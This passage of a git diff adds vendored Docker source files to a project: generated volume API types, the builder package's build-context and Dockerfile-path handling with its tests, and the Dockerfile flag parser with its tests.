+ // Required: true + RefCount int64 `json:"RefCount"` + + // The disk space used by the volume (local driver only) + // Required: true + Size int64 `json:"Size"` +} diff --git a/vendor/github.com/docker/docker/api/types/volume/volumes_create.go b/vendor/github.com/docker/docker/api/types/volume/volumes_create.go new file mode 100644 index 0000000000..679c16006f --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/volume/volumes_create.go @@ -0,0 +1,29 @@ +package volume + +// ---------------------------------------------------------------------------- +// DO NOT EDIT THIS FILE +// This file was generated by `swagger generate operation` +// +// See hack/swagger-gen.sh +// ---------------------------------------------------------------------------- + +// VolumesCreateBody volumes create body +// swagger:model VolumesCreateBody +type VolumesCreateBody struct { + + // Name of the volume driver to use. + // Required: true + Driver string `json:"Driver"` + + // A mapping of driver options and values. These options are passed directly to the driver and are driver specific. + // Required: true + DriverOpts map[string]string `json:"DriverOpts"` + + // User-defined key/value metadata. + // Required: true + Labels map[string]string `json:"Labels"` + + // The new volume's name. If not specified, Docker generates a name. 
+ // Required: true + Name string `json:"Name"` +} diff --git a/vendor/github.com/docker/docker/api/types/volume/volumes_list.go b/vendor/github.com/docker/docker/api/types/volume/volumes_list.go new file mode 100644 index 0000000000..7770bcb8fc --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/volume/volumes_list.go @@ -0,0 +1,23 @@ +package volume + +// ---------------------------------------------------------------------------- +// DO NOT EDIT THIS FILE +// This file was generated by `swagger generate operation` +// +// See hack/swagger-gen.sh +// ---------------------------------------------------------------------------- + +import "github.com/docker/docker/api/types" + +// VolumesListOKBody volumes list o k body +// swagger:model VolumesListOKBody +type VolumesListOKBody struct { + + // List of volumes + // Required: true + Volumes []*types.Volume `json:"Volumes"` + + // Warnings that occurred when fetching the list of volumes + // Required: true + Warnings []string `json:"Warnings"` +} diff --git a/vendor/github.com/docker/docker/builder/builder.go b/vendor/github.com/docker/docker/builder/builder.go new file mode 100644 index 0000000000..ced19e81e6 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/builder.go @@ -0,0 +1,169 @@ +// Package builder defines interfaces for any Docker builder to implement. +// +// Historically, only server-side Dockerfile interpreters existed. +// This package allows for other implementations of Docker builders. +package builder + +import ( + "io" + "os" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/backend" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/image" + "github.com/docker/docker/reference" + "golang.org/x/net/context" +) + +const ( + // DefaultDockerfileName is the Default filename with Docker commands, read by docker build + DefaultDockerfileName string = "Dockerfile" +) + +// Context represents a file system tree. 
+type Context interface { + // Close allows to signal that the filesystem tree won't be used anymore. + // For Context implementations using a temporary directory, it is recommended to + // delete the temporary directory in Close(). + Close() error + // Stat returns an entry corresponding to path if any. + // It is recommended to return an error if path was not found. + // If path is a symlink it also returns the path to the target file. + Stat(path string) (string, FileInfo, error) + // Open opens path from the context and returns a readable stream of it. + Open(path string) (io.ReadCloser, error) + // Walk walks the tree of the context with the function passed to it. + Walk(root string, walkFn WalkFunc) error +} + +// WalkFunc is the type of the function called for each file or directory visited by Context.Walk(). +type WalkFunc func(path string, fi FileInfo, err error) error + +// ModifiableContext represents a modifiable Context. +// TODO: remove this interface once we can get rid of Remove() +type ModifiableContext interface { + Context + // Remove deletes the entry specified by `path`. + // It is usual for directory entries to delete all its subentries. + Remove(path string) error +} + +// FileInfo extends os.FileInfo to allow retrieving an absolute path to the file. +// TODO: remove this interface once pkg/archive exposes a walk function that Context can use. +type FileInfo interface { + os.FileInfo + Path() string +} + +// PathFileInfo is a convenience struct that implements the FileInfo interface. +type PathFileInfo struct { + os.FileInfo + // FilePath holds the absolute path to the file. + FilePath string + // Name holds the basename for the file. + FileName string +} + +// Path returns the absolute path to the file. +func (fi PathFileInfo) Path() string { + return fi.FilePath +} + +// Name returns the basename of the file. 
+func (fi PathFileInfo) Name() string { + if fi.FileName != "" { + return fi.FileName + } + return fi.FileInfo.Name() +} + +// Hashed defines an extra method intended for implementations of os.FileInfo. +type Hashed interface { + // Hash returns the hash of a file. + Hash() string + SetHash(string) +} + +// HashedFileInfo is a convenient struct that augments FileInfo with a field. +type HashedFileInfo struct { + FileInfo + // FileHash represents the hash of a file. + FileHash string +} + +// Hash returns the hash of a file. +func (fi HashedFileInfo) Hash() string { + return fi.FileHash +} + +// SetHash sets the hash of a file. +func (fi *HashedFileInfo) SetHash(h string) { + fi.FileHash = h +} + +// Backend abstracts calls to a Docker Daemon. +type Backend interface { + // TODO: use digest reference instead of name + + // GetImageOnBuild looks up a Docker image referenced by `name`. + GetImageOnBuild(name string) (Image, error) + // TagImage tags an image with newTag + TagImageWithReference(image.ID, reference.Named) error + // PullOnBuild tells Docker to pull image referenced by `name`. + PullOnBuild(ctx context.Context, name string, authConfigs map[string]types.AuthConfig, output io.Writer) (Image, error) + // ContainerAttachRaw attaches to container. + ContainerAttachRaw(cID string, stdin io.ReadCloser, stdout, stderr io.Writer, stream bool) error + // ContainerCreate creates a new Docker container and returns potential warnings + ContainerCreate(config types.ContainerCreateConfig) (container.ContainerCreateCreatedBody, error) + // ContainerRm removes a container specified by `id`. + ContainerRm(name string, config *types.ContainerRmConfig) error + // Commit creates a new Docker image from an existing Docker container. + Commit(string, *backend.ContainerCommitConfig) (string, error) + // ContainerKill stops the container execution abruptly. 
+ ContainerKill(containerID string, sig uint64) error + // ContainerStart starts a new container + ContainerStart(containerID string, hostConfig *container.HostConfig, checkpoint string, checkpointDir string) error + // ContainerWait stops processing until the given container is stopped. + ContainerWait(containerID string, timeout time.Duration) (int, error) + // ContainerUpdateCmdOnBuild updates container.Path and container.Args + ContainerUpdateCmdOnBuild(containerID string, cmd []string) error + // ContainerCreateWorkdir creates the workdir (currently only used on Windows) + ContainerCreateWorkdir(containerID string) error + + // ContainerCopy copies/extracts a source FileInfo to a destination path inside a container + // specified by a container object. + // TODO: make an Extract method instead of passing `decompress` + // TODO: do not pass a FileInfo, instead refactor the archive package to export a Walk function that can be used + // with Context.Walk + // ContainerCopy(name string, res string) (io.ReadCloser, error) + // TODO: use copyBackend api + CopyOnBuild(containerID string, destPath string, src FileInfo, decompress bool) error + + // HasExperimental checks if the backend supports experimental features + HasExperimental() bool + + // SquashImage squashes the fs layers from the provided image down to the specified `to` image + SquashImage(from string, to string) (string, error) +} + +// Image represents a Docker image used by the builder. +type Image interface { + ImageID() string + RunConfig() *container.Config +} + +// ImageCacheBuilder represents a generator for stateful image cache. +type ImageCacheBuilder interface { + // MakeImageCache creates a stateful image cache. + MakeImageCache(cacheFrom []string) ImageCache +} + +// ImageCache abstracts an image cache. 
+// (parent image, child runconfig) -> child image +type ImageCache interface { + // GetCachedImageOnBuild returns a reference to a cached image whose parent equals `parent` + // and runconfig equals `cfg`. A cache miss is expected to return an empty ID and a nil error. + GetCache(parentID string, cfg *container.Config) (imageID string, err error) +} diff --git a/vendor/github.com/docker/docker/builder/context.go b/vendor/github.com/docker/docker/builder/context.go new file mode 100644 index 0000000000..600f42319b --- /dev/null +++ b/vendor/github.com/docker/docker/builder/context.go @@ -0,0 +1,260 @@ +package builder + +import ( + "bufio" + "fmt" + "io" + "io/ioutil" + "os" + "os/exec" + "path/filepath" + "runtime" + "strings" + + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/fileutils" + "github.com/docker/docker/pkg/gitutils" + "github.com/docker/docker/pkg/httputils" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/progress" + "github.com/docker/docker/pkg/streamformatter" +) + +// ValidateContextDirectory checks if all the contents of the directory +// can be read and returns an error if some files can't be read +// symlinks which point to non-existing files don't trigger an error +func ValidateContextDirectory(srcPath string, excludes []string) error { + contextRoot, err := getContextRoot(srcPath) + if err != nil { + return err + } + return filepath.Walk(contextRoot, func(filePath string, f os.FileInfo, err error) error { + if err != nil { + if os.IsPermission(err) { + return fmt.Errorf("can't stat '%s'", filePath) + } + if os.IsNotExist(err) { + return nil + } + return err + } + + // skip this directory/file if it's not in the path, it won't get added to the context + if relFilePath, err := filepath.Rel(contextRoot, filePath); err != nil { + return err + } else if skip, err := fileutils.Matches(relFilePath, excludes); err != nil { + return err + } else if skip { + if f.IsDir() { + return filepath.SkipDir + } + 
return nil + } + + // skip checking if symlinks point to non-existing files, such symlinks can be useful + // also skip named pipes, because they hang on open + if f.Mode()&(os.ModeSymlink|os.ModeNamedPipe) != 0 { + return nil + } + + if !f.IsDir() { + currentFile, err := os.Open(filePath) + if err != nil && os.IsPermission(err) { + return fmt.Errorf("no permission to read from '%s'", filePath) + } + currentFile.Close() + } + return nil + }) +} + +// GetContextFromReader will read the contents of the given reader as either a +// Dockerfile or tar archive. Returns a tar archive used as a context and a +// path to the Dockerfile inside the tar. +func GetContextFromReader(r io.ReadCloser, dockerfileName string) (out io.ReadCloser, relDockerfile string, err error) { + buf := bufio.NewReader(r) + + magic, err := buf.Peek(archive.HeaderSize) + if err != nil && err != io.EOF { + return nil, "", fmt.Errorf("failed to peek context header from STDIN: %v", err) + } + + if archive.IsArchive(magic) { + return ioutils.NewReadCloserWrapper(buf, func() error { return r.Close() }), dockerfileName, nil + } + + // Input should be read as a Dockerfile. + tmpDir, err := ioutil.TempDir("", "docker-build-context-") + if err != nil { + return nil, "", fmt.Errorf("unbale to create temporary context directory: %v", err) + } + + f, err := os.Create(filepath.Join(tmpDir, DefaultDockerfileName)) + if err != nil { + return nil, "", err + } + _, err = io.Copy(f, buf) + if err != nil { + f.Close() + return nil, "", err + } + + if err := f.Close(); err != nil { + return nil, "", err + } + if err := r.Close(); err != nil { + return nil, "", err + } + + tar, err := archive.Tar(tmpDir, archive.Uncompressed) + if err != nil { + return nil, "", err + } + + return ioutils.NewReadCloserWrapper(tar, func() error { + err := tar.Close() + os.RemoveAll(tmpDir) + return err + }), DefaultDockerfileName, nil + +} + +// GetContextFromGitURL uses a Git URL as context for a `docker build`. 
The +// git repo is cloned into a temporary directory used as the context directory. +// Returns the absolute path to the temporary context directory, the relative +// path of the dockerfile in that context directory, and a nil error on +// success. +func GetContextFromGitURL(gitURL, dockerfileName string) (absContextDir, relDockerfile string, err error) { + if _, err := exec.LookPath("git"); err != nil { + return "", "", fmt.Errorf("unable to find 'git': %v", err) + } + if absContextDir, err = gitutils.Clone(gitURL); err != nil { + return "", "", fmt.Errorf("unable to 'git clone' to temporary context directory: %v", err) + } + + return getDockerfileRelPath(absContextDir, dockerfileName) +} + +// GetContextFromURL uses a remote URL as context for a `docker build`. The +// remote resource is downloaded as either a Dockerfile or a tar archive. +// Returns the tar archive used for the context and a path of the +// dockerfile inside the tar. +func GetContextFromURL(out io.Writer, remoteURL, dockerfileName string) (io.ReadCloser, string, error) { + response, err := httputils.Download(remoteURL) + if err != nil { + return nil, "", fmt.Errorf("unable to download remote context %s: %v", remoteURL, err) + } + progressOutput := streamformatter.NewStreamFormatter().NewProgressOutput(out, true) + + // Pass the response body through a progress reader. + progReader := progress.NewProgressReader(response.Body, progressOutput, response.ContentLength, "", fmt.Sprintf("Downloading build context from remote url: %s", remoteURL)) + + return GetContextFromReader(ioutils.NewReadCloserWrapper(progReader, func() error { return response.Body.Close() }), dockerfileName) +} + +// GetContextFromLocalDir uses the given local directory as context for a +// `docker build`. Returns the absolute path to the local context directory, +// the relative path of the dockerfile in that context directory, and a nil +// error on success. 
+func GetContextFromLocalDir(localDir, dockerfileName string) (absContextDir, relDockerfile string, err error) { + // When using a local context directory, when the Dockerfile is specified + // with the `-f/--file` option then it is considered relative to the + // current directory and not the context directory. + if dockerfileName != "" { + if dockerfileName, err = filepath.Abs(dockerfileName); err != nil { + return "", "", fmt.Errorf("unable to get absolute path to Dockerfile: %v", err) + } + } + + return getDockerfileRelPath(localDir, dockerfileName) +} + +// getDockerfileRelPath uses the given context directory for a `docker build` +// and returns the absolute path to the context directory, the relative path of +// the dockerfile in that context directory, and a non-nil error on success. +func getDockerfileRelPath(givenContextDir, givenDockerfile string) (absContextDir, relDockerfile string, err error) { + if absContextDir, err = filepath.Abs(givenContextDir); err != nil { + return "", "", fmt.Errorf("unable to get absolute context directory of given context directory %q: %v", givenContextDir, err) + } + + // The context dir might be a symbolic link, so follow it to the actual + // target directory. + // + // FIXME. We use isUNC (always false on non-Windows platforms) to workaround + // an issue in golang. On Windows, EvalSymLinks does not work on UNC file + // paths (those starting with \\). This hack means that when using links + // on UNC paths, they will not be followed. 
+ if !isUNC(absContextDir) { + absContextDir, err = filepath.EvalSymlinks(absContextDir) + if err != nil { + return "", "", fmt.Errorf("unable to evaluate symlinks in context path: %v", err) + } + } + + stat, err := os.Lstat(absContextDir) + if err != nil { + return "", "", fmt.Errorf("unable to stat context directory %q: %v", absContextDir, err) + } + + if !stat.IsDir() { + return "", "", fmt.Errorf("context must be a directory: %s", absContextDir) + } + + absDockerfile := givenDockerfile + if absDockerfile == "" { + // No -f/--file was specified so use the default relative to the + // context directory. + absDockerfile = filepath.Join(absContextDir, DefaultDockerfileName) + + // Just to be nice ;-) look for 'dockerfile' too but only + // use it if we found it, otherwise ignore this check + if _, err = os.Lstat(absDockerfile); os.IsNotExist(err) { + altPath := filepath.Join(absContextDir, strings.ToLower(DefaultDockerfileName)) + if _, err = os.Lstat(altPath); err == nil { + absDockerfile = altPath + } + } + } + + // If not already an absolute path, the Dockerfile path should be joined to + // the base directory. + if !filepath.IsAbs(absDockerfile) { + absDockerfile = filepath.Join(absContextDir, absDockerfile) + } + + // Evaluate symlinks in the path to the Dockerfile too. + // + // FIXME. We use isUNC (always false on non-Windows platforms) to workaround + // an issue in golang. On Windows, EvalSymLinks does not work on UNC file + // paths (those starting with \\). This hack means that when using links + // on UNC paths, they will not be followed. 
+ if !isUNC(absDockerfile) { + absDockerfile, err = filepath.EvalSymlinks(absDockerfile) + if err != nil { + return "", "", fmt.Errorf("unable to evaluate symlinks in Dockerfile path: %v", err) + } + } + + if _, err := os.Lstat(absDockerfile); err != nil { + if os.IsNotExist(err) { + return "", "", fmt.Errorf("Cannot locate Dockerfile: %q", absDockerfile) + } + return "", "", fmt.Errorf("unable to stat Dockerfile: %v", err) + } + + if relDockerfile, err = filepath.Rel(absContextDir, absDockerfile); err != nil { + return "", "", fmt.Errorf("unable to get relative Dockerfile path: %v", err) + } + + if strings.HasPrefix(relDockerfile, ".."+string(filepath.Separator)) { + return "", "", fmt.Errorf("The Dockerfile (%s) must be within the build context (%s)", givenDockerfile, givenContextDir) + } + + return absContextDir, relDockerfile, nil +} + +// isUNC returns true if the path is UNC (one starting \\). It always returns +// false on Linux. +func isUNC(path string) bool { + return runtime.GOOS == "windows" && strings.HasPrefix(path, `\\`) +} diff --git a/vendor/github.com/docker/docker/builder/context_test.go b/vendor/github.com/docker/docker/builder/context_test.go new file mode 100644 index 0000000000..27d29d79f4 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/context_test.go @@ -0,0 +1,307 @@ +package builder + +import ( + "archive/tar" + "bytes" + "io" + "io/ioutil" + "path/filepath" + "runtime" + "strings" + "testing" + + "github.com/docker/docker/pkg/archive" +) + +var prepareEmpty = func(t *testing.T) (string, func()) { + return "", func() {} +} + +var prepareNoFiles = func(t *testing.T) (string, func()) { + return createTestTempDir(t, "", "builder-context-test") +} + +var prepareOneFile = func(t *testing.T) (string, func()) { + contextDir, cleanup := createTestTempDir(t, "", "builder-context-test") + createTestTempFile(t, contextDir, DefaultDockerfileName, dockerfileContents, 0777) + return contextDir, cleanup +} + +func 
testValidateContextDirectory(t *testing.T, prepare func(t *testing.T) (string, func()), excludes []string) { + contextDir, cleanup := prepare(t) + defer cleanup() + + err := ValidateContextDirectory(contextDir, excludes) + + if err != nil { + t.Fatalf("Error should be nil, got: %s", err) + } +} + +func TestGetContextFromLocalDirNoDockerfile(t *testing.T) { + contextDir, cleanup := createTestTempDir(t, "", "builder-context-test") + defer cleanup() + + absContextDir, relDockerfile, err := GetContextFromLocalDir(contextDir, "") + + if err == nil { + t.Fatalf("Error should not be nil") + } + + if absContextDir != "" { + t.Fatalf("Absolute directory path should be empty, got: %s", absContextDir) + } + + if relDockerfile != "" { + t.Fatalf("Relative path to Dockerfile should be empty, got: %s", relDockerfile) + } +} + +func TestGetContextFromLocalDirNotExistingDir(t *testing.T) { + contextDir, cleanup := createTestTempDir(t, "", "builder-context-test") + defer cleanup() + + fakePath := filepath.Join(contextDir, "fake") + + absContextDir, relDockerfile, err := GetContextFromLocalDir(fakePath, "") + + if err == nil { + t.Fatalf("Error should not be nil") + } + + if absContextDir != "" { + t.Fatalf("Absolute directory path should be empty, got: %s", absContextDir) + } + + if relDockerfile != "" { + t.Fatalf("Relative path to Dockerfile should be empty, got: %s", relDockerfile) + } +} + +func TestGetContextFromLocalDirNotExistingDockerfile(t *testing.T) { + contextDir, cleanup := createTestTempDir(t, "", "builder-context-test") + defer cleanup() + + fakePath := filepath.Join(contextDir, "fake") + + absContextDir, relDockerfile, err := GetContextFromLocalDir(contextDir, fakePath) + + if err == nil { + t.Fatalf("Error should not be nil") + } + + if absContextDir != "" { + t.Fatalf("Absolute directory path should be empty, got: %s", absContextDir) + } + + if relDockerfile != "" { + t.Fatalf("Relative path to Dockerfile should be empty, got: %s", relDockerfile) + } +} + +func 
TestGetContextFromLocalDirWithNoDirectory(t *testing.T) { + contextDir, dirCleanup := createTestTempDir(t, "", "builder-context-test") + defer dirCleanup() + + createTestTempFile(t, contextDir, DefaultDockerfileName, dockerfileContents, 0777) + + chdirCleanup := chdir(t, contextDir) + defer chdirCleanup() + + absContextDir, relDockerfile, err := GetContextFromLocalDir(contextDir, "") + + if err != nil { + t.Fatalf("Error when getting context from local dir: %s", err) + } + + if absContextDir != contextDir { + t.Fatalf("Absolute directory path should be equal to %s, got: %s", contextDir, absContextDir) + } + + if relDockerfile != DefaultDockerfileName { + t.Fatalf("Relative path to dockerfile should be equal to %s, got: %s", DefaultDockerfileName, relDockerfile) + } +} + +func TestGetContextFromLocalDirWithDockerfile(t *testing.T) { + contextDir, cleanup := createTestTempDir(t, "", "builder-context-test") + defer cleanup() + + createTestTempFile(t, contextDir, DefaultDockerfileName, dockerfileContents, 0777) + + absContextDir, relDockerfile, err := GetContextFromLocalDir(contextDir, "") + + if err != nil { + t.Fatalf("Error when getting context from local dir: %s", err) + } + + if absContextDir != contextDir { + t.Fatalf("Absolute directory path should be equal to %s, got: %s", contextDir, absContextDir) + } + + if relDockerfile != DefaultDockerfileName { + t.Fatalf("Relative path to dockerfile should be equal to %s, got: %s", DefaultDockerfileName, relDockerfile) + } +} + +func TestGetContextFromLocalDirLocalFile(t *testing.T) { + contextDir, cleanup := createTestTempDir(t, "", "builder-context-test") + defer cleanup() + + createTestTempFile(t, contextDir, DefaultDockerfileName, dockerfileContents, 0777) + testFilename := createTestTempFile(t, contextDir, "tmpTest", "test", 0777) + + absContextDir, relDockerfile, err := GetContextFromLocalDir(testFilename, "") + + if err == nil { + t.Fatalf("Error should not be nil") + } + + if absContextDir != "" { + 
t.Fatalf("Absolute directory path should be empty, got: %s", absContextDir) + } + + if relDockerfile != "" { + t.Fatalf("Relative path to Dockerfile should be empty, got: %s", relDockerfile) + } +} + +func TestGetContextFromLocalDirWithCustomDockerfile(t *testing.T) { + contextDir, cleanup := createTestTempDir(t, "", "builder-context-test") + defer cleanup() + + chdirCleanup := chdir(t, contextDir) + defer chdirCleanup() + + createTestTempFile(t, contextDir, DefaultDockerfileName, dockerfileContents, 0777) + + absContextDir, relDockerfile, err := GetContextFromLocalDir(contextDir, DefaultDockerfileName) + + if err != nil { + t.Fatalf("Error when getting context from local dir: %s", err) + } + + if absContextDir != contextDir { + t.Fatalf("Absolute directory path should be equal to %s, got: %s", contextDir, absContextDir) + } + + if relDockerfile != DefaultDockerfileName { + t.Fatalf("Relative path to dockerfile should be equal to %s, got: %s", DefaultDockerfileName, relDockerfile) + } + +} + +func TestGetContextFromReaderString(t *testing.T) { + tarArchive, relDockerfile, err := GetContextFromReader(ioutil.NopCloser(strings.NewReader(dockerfileContents)), "") + + if err != nil { + t.Fatalf("Error when executing GetContextFromReader: %s", err) + } + + tarReader := tar.NewReader(tarArchive) + + _, err = tarReader.Next() + + if err != nil { + t.Fatalf("Error when reading tar archive: %s", err) + } + + buff := new(bytes.Buffer) + buff.ReadFrom(tarReader) + contents := buff.String() + + _, err = tarReader.Next() + + if err != io.EOF { + t.Fatalf("Tar stream too long: %s", err) + } + + if err = tarArchive.Close(); err != nil { + t.Fatalf("Error when closing tar stream: %s", err) + } + + if dockerfileContents != contents { + t.Fatalf("Uncompressed tar archive does not equal: %s, got: %s", dockerfileContents, contents) + } + + if relDockerfile != DefaultDockerfileName { + t.Fatalf("Relative path not equals %s, got: %s", DefaultDockerfileName, relDockerfile) + } +} + +func 
TestGetContextFromReaderTar(t *testing.T) { + contextDir, cleanup := createTestTempDir(t, "", "builder-context-test") + defer cleanup() + + createTestTempFile(t, contextDir, DefaultDockerfileName, dockerfileContents, 0777) + + tarStream, err := archive.Tar(contextDir, archive.Uncompressed) + + if err != nil { + t.Fatalf("Error when creating tar: %s", err) + } + + tarArchive, relDockerfile, err := GetContextFromReader(tarStream, DefaultDockerfileName) + + if err != nil { + t.Fatalf("Error when executing GetContextFromReader: %s", err) + } + + tarReader := tar.NewReader(tarArchive) + + header, err := tarReader.Next() + + if err != nil { + t.Fatalf("Error when reading tar archive: %s", err) + } + + if header.Name != DefaultDockerfileName { + t.Fatalf("Dockerfile name should be: %s, got: %s", DefaultDockerfileName, header.Name) + } + + buff := new(bytes.Buffer) + buff.ReadFrom(tarReader) + contents := buff.String() + + _, err = tarReader.Next() + + if err != io.EOF { + t.Fatalf("Tar stream too long: %s", err) + } + + if err = tarArchive.Close(); err != nil { + t.Fatalf("Error when closing tar stream: %s", err) + } + + if dockerfileContents != contents { + t.Fatalf("Uncompressed tar archive does not equal: %s, got: %s", dockerfileContents, contents) + } + + if relDockerfile != DefaultDockerfileName { + t.Fatalf("Relative path not equals %s, got: %s", DefaultDockerfileName, relDockerfile) + } +} + +func TestValidateContextDirectoryEmptyContext(t *testing.T) { + // This isn't a valid test on Windows. See https://play.golang.org/p/RR6z6jxR81. + // The test will ultimately end up calling filepath.Abs(""). On Windows, + // golang will error. On Linux, golang will return /. Due to there being + // drive letters on Windows, this is probably the correct behaviour for + // Windows. 
+ if runtime.GOOS == "windows" { + t.Skip("Invalid test on Windows") + } + testValidateContextDirectory(t, prepareEmpty, []string{}) +} + +func TestValidateContextDirectoryContextWithNoFiles(t *testing.T) { + testValidateContextDirectory(t, prepareNoFiles, []string{}) +} + +func TestValidateContextDirectoryWithOneFile(t *testing.T) { + testValidateContextDirectory(t, prepareOneFile, []string{}) +} + +func TestValidateContextDirectoryWithOneFileExcludes(t *testing.T) { + testValidateContextDirectory(t, prepareOneFile, []string{DefaultDockerfileName}) +} diff --git a/vendor/github.com/docker/docker/builder/context_unix.go b/vendor/github.com/docker/docker/builder/context_unix.go new file mode 100644 index 0000000000..d1f72e0573 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/context_unix.go @@ -0,0 +1,11 @@ +// +build !windows + +package builder + +import ( + "path/filepath" +) + +func getContextRoot(srcPath string) (string, error) { + return filepath.Join(srcPath, "."), nil +} diff --git a/vendor/github.com/docker/docker/builder/context_windows.go b/vendor/github.com/docker/docker/builder/context_windows.go new file mode 100644 index 0000000000..b8ba2ba231 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/context_windows.go @@ -0,0 +1,17 @@ +// +build windows + +package builder + +import ( + "path/filepath" + + "github.com/docker/docker/pkg/longpath" +) + +func getContextRoot(srcPath string) (string, error) { + cr, err := filepath.Abs(srcPath) + if err != nil { + return "", err + } + return longpath.AddPrefix(cr), nil +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/bflag.go b/vendor/github.com/docker/docker/builder/dockerfile/bflag.go new file mode 100644 index 0000000000..1e03693072 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/bflag.go @@ -0,0 +1,176 @@ +package dockerfile + +import ( + "fmt" + "strings" +) + +// FlagType is the type of the build flag +type FlagType int + +const ( + boolType 
FlagType = iota + stringType +) + +// BFlags contains all flags information for the builder +type BFlags struct { + Args []string // actual flags/args from cmd line + flags map[string]*Flag + used map[string]*Flag + Err error +} + +// Flag contains all information for a flag +type Flag struct { + bf *BFlags + name string + flagType FlagType + Value string +} + +// NewBFlags returns the new BFlags struct +func NewBFlags() *BFlags { + return &BFlags{ + flags: make(map[string]*Flag), + used: make(map[string]*Flag), + } +} + +// AddBool adds a bool flag to BFlags +// Note, any error will be generated when Parse() is called (see Parse). +func (bf *BFlags) AddBool(name string, def bool) *Flag { + flag := bf.addFlag(name, boolType) + if flag == nil { + return nil + } + if def { + flag.Value = "true" + } else { + flag.Value = "false" + } + return flag +} + +// AddString adds a string flag to BFlags +// Note, any error will be generated when Parse() is called (see Parse). +func (bf *BFlags) AddString(name string, def string) *Flag { + flag := bf.addFlag(name, stringType) + if flag == nil { + return nil + } + flag.Value = def + return flag +} + +// addFlag is a generic func used by the other AddXXX() func +// to add a new flag to the BFlags struct. +// Note, any error will be generated when Parse() is called (see Parse). 
+func (bf *BFlags) addFlag(name string, flagType FlagType) *Flag { + if _, ok := bf.flags[name]; ok { + bf.Err = fmt.Errorf("Duplicate flag defined: %s", name) + return nil + } + + newFlag := &Flag{ + bf: bf, + name: name, + flagType: flagType, + } + bf.flags[name] = newFlag + + return newFlag +} + +// IsUsed checks if the flag is used +func (fl *Flag) IsUsed() bool { + if _, ok := fl.bf.used[fl.name]; ok { + return true + } + return false +} + +// IsTrue checks if a bool flag is true +func (fl *Flag) IsTrue() bool { + if fl.flagType != boolType { + // Should never get here + panic(fmt.Errorf("Trying to use IsTrue on a non-boolean: %s", fl.name)) + } + return fl.Value == "true" +} + +// Parse parses and checks if the BFlags is valid. +// Any error noticed during the AddXXX() funcs will be generated/returned +// here. We do this because an error during AddXXX() is more like a +// compile time error so it doesn't matter too much when we stop our +// processing as long as we do stop it, so this allows the code +// around AddXXX() to be just: +// defFlag := AddString("description", "") +// w/o needing to add an if-statement around each one. 
+func (bf *BFlags) Parse() error { + // If there was an error while defining the possible flags + // go ahead and bubble it back up here since we didn't do it + // earlier in the processing + if bf.Err != nil { + return fmt.Errorf("Error setting up flags: %s", bf.Err) + } + + for _, arg := range bf.Args { + if !strings.HasPrefix(arg, "--") { + return fmt.Errorf("Arg should start with -- : %s", arg) + } + + if arg == "--" { + return nil + } + + arg = arg[2:] + value := "" + + index := strings.Index(arg, "=") + if index >= 0 { + value = arg[index+1:] + arg = arg[:index] + } + + flag, ok := bf.flags[arg] + if !ok { + return fmt.Errorf("Unknown flag: %s", arg) + } + + if _, ok = bf.used[arg]; ok { + return fmt.Errorf("Duplicate flag specified: %s", arg) + } + + bf.used[arg] = flag + + switch flag.flagType { + case boolType: + // value == "" is only ok if no "=" was specified + if index >= 0 && value == "" { + return fmt.Errorf("Missing a value on flag: %s", arg) + } + + lower := strings.ToLower(value) + if lower == "" { + flag.Value = "true" + } else if lower == "true" || lower == "false" { + flag.Value = lower + } else { + return fmt.Errorf("Expecting boolean value for flag %s, not: %s", arg, value) + } + + case stringType: + if index < 0 { + return fmt.Errorf("Missing a value on flag: %s", arg) + } + flag.Value = value + + default: + panic(fmt.Errorf("No idea what kind of flag we have! 
Should never get here!")) + } + + } + + return nil +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/bflag_test.go b/vendor/github.com/docker/docker/builder/dockerfile/bflag_test.go new file mode 100644 index 0000000000..65cfceadd0 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/bflag_test.go @@ -0,0 +1,187 @@ +package dockerfile + +import ( + "testing" +) + +func TestBuilderFlags(t *testing.T) { + var expected string + var err error + + // --- + + bf := NewBFlags() + bf.Args = []string{} + if err := bf.Parse(); err != nil { + t.Fatalf("Test1 of %q was supposed to work: %s", bf.Args, err) + } + + // --- + + bf = NewBFlags() + bf.Args = []string{"--"} + if err := bf.Parse(); err != nil { + t.Fatalf("Test2 of %q was supposed to work: %s", bf.Args, err) + } + + // --- + + bf = NewBFlags() + flStr1 := bf.AddString("str1", "") + flBool1 := bf.AddBool("bool1", false) + bf.Args = []string{} + if err = bf.Parse(); err != nil { + t.Fatalf("Test3 of %q was supposed to work: %s", bf.Args, err) + } + + if flStr1.IsUsed() == true { + t.Fatalf("Test3 - str1 was not used!") + } + if flBool1.IsUsed() == true { + t.Fatalf("Test3 - bool1 was not used!") + } + + // --- + + bf = NewBFlags() + flStr1 = bf.AddString("str1", "HI") + flBool1 = bf.AddBool("bool1", false) + bf.Args = []string{} + + if err = bf.Parse(); err != nil { + t.Fatalf("Test4 of %q was supposed to work: %s", bf.Args, err) + } + + if flStr1.Value != "HI" { + t.Fatalf("Str1 was supposed to default to: HI") + } + if flBool1.IsTrue() { + t.Fatalf("Bool1 was supposed to default to: false") + } + if flStr1.IsUsed() == true { + t.Fatalf("Str1 was not used!") + } + if flBool1.IsUsed() == true { + t.Fatalf("Bool1 was not used!") + } + + // --- + + bf = NewBFlags() + flStr1 = bf.AddString("str1", "HI") + bf.Args = []string{"--str1"} + + if err = bf.Parse(); err == nil { + t.Fatalf("Test %q was supposed to fail", bf.Args) + } + + // --- + + bf = NewBFlags() + flStr1 = bf.AddString("str1", 
